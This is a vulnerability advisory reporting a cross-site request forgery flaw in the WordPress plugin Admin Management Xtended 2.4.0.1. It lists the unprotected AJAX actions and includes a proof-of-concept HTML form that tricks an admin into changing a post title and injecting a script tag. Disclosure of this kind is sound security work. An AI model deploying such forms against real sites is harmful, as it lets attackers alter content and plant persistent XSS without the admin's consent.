Admin Management Xtended [CSRF]
Admin Management Xtended plugin suffers for a CSRF vulnerability.
Plugin doesn’t implement security checks to avoid CSRF attacks for any of registered AJAX actions. This could allow malicious site to trick a user of the infected website with administrative rights, in order to perform these actions with arbitrary data.
This actions include:
- Change post/page title
- Change post/page slug
- Toggle comment status (open/closed) for specific posts/pages
- Change media description
- Change post/page/link visibility
There are many more actions that are vulnerable to this attack. The ones listed in this report only, could easily lead to a series of different types of attack such as Persistent XSS, Sensitive Data Exposure etc.
PoC
The following form will perform a POST request to the vulnerable website and update the title of the post with id 1 injecting JS code to the title. For this to work a logged in user with administrative rights is required to submit the form.
<h1>Admin Management Xtended - CSRF</h1>
<p>
The form is misleading and actually it performs a request to update a specific post title.
The new title will have injected JS code just to demonstrate how this issue could lead to an XSS attack.
</p>
<form method="post" action="http://wp1.dev/wp-admin/admin-ajax.php">
<input type="hidden" name="action" value="ame_save_title">
<!--This field actually expresses the post id-->
<input type="hidden" name="category_id" value="1">
<input type="hidden" name="new_title" value="Old Title<script>alert('XSS')</script>">
<button type="submit" value="Push Me">Push Me</button>
</form>
- 21 March 2016
- Pan Vag
- wpseek.com
- wordpress.org
- 2.4.0.1
- WordPress 4.4.2
- DWF-2016-87008